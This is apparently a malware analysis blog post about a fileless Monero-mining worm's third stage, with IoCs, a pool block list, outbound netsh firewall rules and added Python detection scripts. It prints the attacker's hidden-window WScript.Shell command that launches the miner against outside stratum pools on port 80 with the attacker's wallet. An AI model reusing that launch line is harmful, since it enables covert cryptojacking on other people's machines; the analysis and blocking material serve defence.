Introducing the Third Stage
Third Stage Execution of Monero Miner
The Monero wallet address is visible in clear text in the code. Unfortunately the address cannot be traced much further: Monero hides amounts and counterparties on-chain, so the only practical lead is the per-address statistics that some pools expose on their dashboards.
Monero address: 46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE
The primary pool is stratum+tcp://pool.supportxmr.com:80, with mine.xmrpool.net and pool.minemonero.pro configured as failover pools, all on port 80 (stratum on a web port slips past naive egress filtering). The miner is launched through a WScript.Shell Run call. The switches are the usual stratum-miner ones (xmrig uses exactly this set): -B runs the miner in the background, -o gives a pool URL, -u the username (here the wallet address), -p the password (a dummy "x"), and the trailing 0 after the command string is the Run window style, which hides the window:
w.run "%temp%\taskservice.exe -B
    -o stratum+tcp://pool.supportxmr.com:80 -u 46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE
    -o stratum+tcp://mine.xmrpool.net:80 -u 46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE
    -o stratum+tcp://pool.minemonero.pro:80 -u 46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE
    -p x", 0
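As an added example (not code from the original analysis), the following Python parses a Run line of this shape and pulls out the indicators a detection rule would key on: pool hosts and ports, the wallet address (checked against Monero's base58 address format), the background flag and the hidden-window style. SAMPLE_RUN_LINE is constructed from the command above; the switch conventions (-B/-o/-u/-p as xmrig uses them) are assumed to apply to taskservice.exe.

```python
"""Parse a stratum-miner launch line like the WScript.Shell Run call above.

Added example, not code from the original post. SAMPLE_RUN_LINE is constructed
from the command shown in the post; the switch conventions (-B/-o/-u/-p as
used by xmrig) are assumed to apply to taskservice.exe.
"""
import re
from dataclasses import dataclass, field

# Monero base58 alphabet omits 0, O, I and l. Standard addresses are 95 chars
# starting with '4', subaddresses 95 chars starting with '8', integrated
# addresses 106 chars starting with '4'.
_B58 = r"[1-9A-HJ-NP-Za-km-z]"
MONERO_ADDR_RE = re.compile(rf"^(?:4{_B58}{{94}}|8{_B58}{{94}}|4{_B58}{{105}})$")
STRATUM_URL_RE = re.compile(r"^(stratum\+(?:tcp|ssl))://([^/:]+):(\d{1,5})$")
RUN_CALL_RE = re.compile(r'\.run\s+"(.*?)"\s*,\s*(\d+)', re.I | re.S)
WEB_PORTS = {80, 443, 8080}  # stratum on these ports points at egress-filter evasion

SAMPLE_RUN_LINE = (  # constructed from the post's command line, line breaks kept
    'w.run "%temp%\\taskservice.exe -B\n'
    '-o stratum+tcp://pool.supportxmr.com:80 -u\n'
    '46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE\n'
    '-o stratum+tcp://mine.xmrpool.net:80 -u\n'
    '46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE\n'
    '-o stratum+tcp://pool.minemonero.pro:80 -u\n'
    '46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE\n'
    '-p x" ,0'
)


@dataclass
class MinerIndicators:
    binary: str = ""
    background: bool = False
    hidden_window: bool = False
    pools: list = field(default_factory=list)    # (scheme, host, port)
    wallets: list = field(default_factory=list)
    password: str = ""
    notes: list = field(default_factory=list)


def is_monero_address(s: str) -> bool:
    return bool(MONERO_ADDR_RE.match(s))


def parse_miner_args(cmdline: str) -> MinerIndicators:
    """Walk the miner's argv; unknown tokens are skipped rather than failing."""
    tokens = cmdline.split()
    ind = MinerIndicators(binary=tokens[0] if tokens else "")
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if tok in ("-B", "--background"):
            ind.background = True
            i += 1
            continue
        if tok in ("-o", "--url"):
            m = STRATUM_URL_RE.match(nxt)
            if m:
                ind.pools.append((m.group(1), m.group(2), int(m.group(3))))
            else:
                ind.notes.append(f"unparsed pool url: {nxt}")
        elif tok in ("-u", "--user"):
            ind.wallets.append(nxt)
        elif tok in ("-p", "--pass"):
            ind.password = nxt
        else:
            i += 1
            continue
        i += 2
    for _scheme, host, port in ind.pools:
        if port in WEB_PORTS:
            ind.notes.append(f"stratum on web port {port} ({host})")
    for w in set(ind.wallets):
        if not is_monero_address(w):
            ind.notes.append(f"user is not a Monero address: {w}")
    if len(ind.pools) > 1:
        ind.notes.append(f"{len(ind.pools)} pools configured (failover)")
    return ind


def parse_run_line(vbs_line: str) -> MinerIndicators:
    """Extract the command string and window style from a WshShell.Run call."""
    m = RUN_CALL_RE.search(vbs_line)
    if not m:
        raise ValueError("no WScript.Shell Run call found")
    ind = parse_miner_args(m.group(1))
    ind.hidden_window = int(m.group(2)) == 0  # intWindowStyle 0 = hidden window
    return ind


if __name__ == "__main__":
    r = parse_run_line(SAMPLE_RUN_LINE)
    print(r.binary, r.pools, r.hidden_window, r.notes)
```

Feed it the CommandLine field of a process-creation event (Sysmon event 1, or 4688 with command-line auditing on); a hit on a stratum URL plus a valid-looking wallet in -u is a far stronger signal than the binary name, which the attacker picks freely.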
Many other interesting sections deserve analysis, but let's stop here for now.
IoC.
Please find some of the most interesting IoCs below, for your convenience.
- URL: http://118.184.48.95:8000/
- Monero address: 46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE
- SHA256: 19e15a4288e109405f0181d921d3645e4622c87c4050004357355b7a9bf862cc
- SHA256: 038d4ef30a0bfebe3bfd48a5b6fed1b47d1e9b2ed737e8ca0447d6b1848ce309
Conclusion.
We are facing one of the first complex deliveries of cryptocoin-mining malware. Everybody knows about CryptoMine, BitCoinMiner and Adylkuzz, which basically dropped a coin miner on the target machine, so if you are wondering "Why, Marco, do you write 'one of the first malware'?", well, what I actually wrote is one of the first "complex" deliveries. The usual coin-mining malware is delivered with no propagation module, no exploitation module and no file-less techniques. In fact, the way this Monero CPU miner has been delivered includes an advanced in-memory inflation technique: the unpacked malware is never saved to the hard drive (which bypasses some antivirus products) but is inflated directly in memory and called from memory itself.
We can consider this malware a new generation of all-in-memory CryptoWorm.
Another interesting observation, at least from my personal point of view, comes from the first stage. Why did the attacker include this seemingly useless stage? It is a mere dropper with no controls and no evasions. The attacker could have delivered the second stage directly within the first stage, ensuring a stealthier network fingerprint. So why did the attacker decide to deliver the CryptoWorm through the first stage? Maybe the first stage is part of a bigger framework? Are we facing a new generation of malware generator kits?
List of IPs/domains to be blocked. Note that the 104.24.x, 104.25.x and 104.27.x entries are Cloudflare-shared addresses that front many unrelated sites and change over time, so block those pools by domain (DNS sinkhole or proxy) rather than by IP; the other addresses are a point-in-time resolution and should be re-checked before deployment.
Pool name | IP block list
bohemianpool.com | 80.188.53.27
dwarfpool.com | 104.25.51.105
fasthash.net | 198.255.38.242
iwanttoearn.money | 212.175.35.221
minemonero.gq | 163.172.174.140
minercircle.com | 163.172.80.114
minexmr.com | 104.25.209.15
minexmr.org | 52.8.187.102
mixpools.org | 149.202.175.112
monero.crypto-pool.fr | 212.83.158.14
monero.hashvault.pro | 107.191.46.207
monero.lindon-pool.win | 151.80.41.29
monero.miners.pro | 194.247.13.160
monero.riefly.id | 103.10.61.52
monero.us.to | 174.138.53.64
monerohash.com | 198.251.81.82
monerominer.life | 138.197.199.239
moneroocean.stream | 104.24.121.33
moneropool.com | 104.27.159.16
moneropool.nl | 139.162.158.112
moriaxmr.com | 178.254.29.69
nanopool.org | 104.27.111.34
pool.xmr.pt | 94.46.164.183
pooldd.com | 104.27.150.118
poolto.be | 130.240.22.202
ratchetmining.com | 136.144.137.125
supportxmr.com | 88.99.138.74
teracycle.net | 163.172.174.140
usxmrpool.com | 167.88.115.253
viaxmr.com | 104.24.106.79
xmr.alimabi.cn | 61.160.224.169
xmr.mypool.online | 78.47.63.190
xmr.prohash.net | 138.201.206.47
xmr.suprnova.cc | 145.239.65.23
xmrpool.eu | 176.31.105.53
xmrpool.net | 107.167.87.242
xmrpool.xyz | 165.227.65.65
Run these commands to block the pool connections at the Windows firewall. The miner initiates the connections, so the rules must be outbound (dir=out): an inbound rule against these addresses would not stop the mining traffic at all. Duplicate entries have been removed; every rule shares the name "IP Block" so the whole set can later be dropped with a single `netsh advfirewall firewall delete rule name="IP Block"`.
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=94.23.41.130/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=37.59.43.131/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=37.59.44.193/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=37.59.45.174/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=37.59.54.205/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=37.59.55.60/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=37.187.154.79/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=46.105.103.169/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=78.46.89.102/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=78.46.91.134/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=78.46.91.171/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=91.121.87.10/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=94.23.206.130/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=94.23.212.204/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=94.130.164.60/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=176.31.117.82/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=178.63.48.196/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=188.165.199.78/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=188.165.214.76/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=188.165.254.85/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=80.188.53.27/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=104.25.51.105/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=198.255.38.242/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=212.175.35.221/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=163.172.174.140/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=163.172.80.114/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=104.25.209.15/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=52.8.187.102/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=149.202.175.112/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=212.83.158.14/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=107.191.46.207/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=151.80.41.29/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=194.247.13.160/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=103.10.61.52/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=174.138.53.64/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=198.251.81.82/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=138.197.199.239/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=104.24.121.33/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=104.27.159.16/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=139.162.158.112/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=178.254.29.69/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=104.27.111.34/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=94.46.164.183/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=104.27.150.118/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=130.240.22.202/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=136.144.137.125/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=88.99.138.74/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=167.88.115.253/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=104.24.106.79/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=61.160.224.169/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=78.47.63.190/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=138.201.206.47/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=145.239.65.23/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=176.31.105.53/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=107.167.87.242/32
netsh advfirewall firewall add rule name="IP Block" dir=out interface=any action=block remoteip=165.227.65.65/32
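The pool table and the firewall rules above are more useful as detection and blocking logic than as a flat list, so here is an added Python example (not from the original post) that suffix-matches DNS queries against the pool domains, flags pool IPs that sit in shared CDN space as low-confidence indicators, and emits a single consolidated outbound netsh rule for the remaining addresses. POOLS is a subset of the table above; CDN_RANGES is a constructed subset of Cloudflare's published ranges (fetch the live list in production); SAMPLE_LOGS are constructed Sysmon-style key=value lines.

```python
"""Pool-list matching and a consolidated outbound block rule.

Added example, not from the original post. POOLS is a subset of the table above;
CDN_RANGES is a constructed subset of Cloudflare's published ranges (fetch the
live list in production); SAMPLE_LOGS are constructed Sysmon-style lines.
"""
import ipaddress
import re

POOLS = {  # pool domain -> IP from the table above (subset)
    "supportxmr.com": "88.99.138.74",
    "xmrpool.net": "107.167.87.242",
    "monero.crypto-pool.fr": "212.83.158.14",
    "minemonero.gq": "163.172.174.140",
    "teracycle.net": "163.172.174.140",   # same host as minemonero.gq
    "dwarfpool.com": "104.25.51.105",     # Cloudflare-fronted
    "minexmr.com": "104.25.209.15",       # Cloudflare-fronted
    "nanopool.org": "104.27.111.34",      # Cloudflare-fronted
}

# Constructed subset of Cloudflare's published IPv4 ranges; assumed, not authoritative.
CDN_RANGES = [ipaddress.ip_network(n) for n in ("104.16.0.0/13", "104.24.0.0/14")]

DNS_RE = re.compile(r"EventID=22\b.*?QueryName=(\S+)")
NET_RE = re.compile(r"EventID=3\b.*?DestinationIp=(\S+)\s+DestinationPort=(\d+)")

SAMPLE_LOGS = [  # constructed, Sysmon event 22 (DNS) and event 3 (network) style
    r"EventID=22 Image=C:\Users\bob\AppData\Local\Temp\taskservice.exe QueryName=pool.supportxmr.com",
    r"EventID=3 Image=C:\Users\bob\AppData\Local\Temp\taskservice.exe DestinationIp=88.99.138.74 DestinationPort=80",
    r"EventID=3 Image=C:\Program Files\Browser\browser.exe DestinationIp=104.25.51.105 DestinationPort=443",
    r"EventID=22 Image=C:\Program Files\Browser\browser.exe QueryName=www.example.com",
]


def pool_for_host(host: str):
    """Suffix match so pool.supportxmr.com hits supportxmr.com; None if no pool matches."""
    host = host.lower().rstrip(".")
    for dom in POOLS:
        if host == dom or host.endswith("." + dom):
            return dom
    return None


def ip_is_cdn(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CDN_RANGES)


def scan_logs(lines):
    """Return (kind, indicator, pools, confidence) tuples for lines touching a pool."""
    hits = []
    for line in lines:
        m = DNS_RE.search(line)
        if m:
            dom = pool_for_host(m.group(1))
            if dom:
                hits.append(("dns", m.group(1), [dom], "high"))
            continue
        m = NET_RE.search(line)
        if m:
            ip, port = m.group(1), int(m.group(2))
            doms = [d for d, a in POOLS.items() if a == ip]
            if doms:
                # A shared CDN address is weak evidence: the same IP fronts unrelated sites.
                conf = "low" if ip_is_cdn(ip) else "high"
                hits.append(("net", f"{ip}:{port}", doms, conf))
    return hits


def netsh_block_rule(name: str = "XMR pool block") -> str:
    """One outbound rule (dir=out: the miner dials out, an inbound rule would not stop it).
    CDN-fronted addresses are left out; block those domains at DNS/proxy instead."""
    ips = sorted({a for a in POOLS.values() if not ip_is_cdn(a)}, key=ipaddress.ip_address)
    return (f'netsh advfirewall firewall add rule name="{name}" dir=out '
            f'interface=any action=block remoteip={",".join(ips)}')


if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS):
        print(hit)
    print(netsh_block_rule())
```

The DNS match is the one to alert on: it names the pool regardless of which CDN edge the domain currently resolves to, and it carries the querying process image, which is what ties the traffic back to the dropped taskservice.exe.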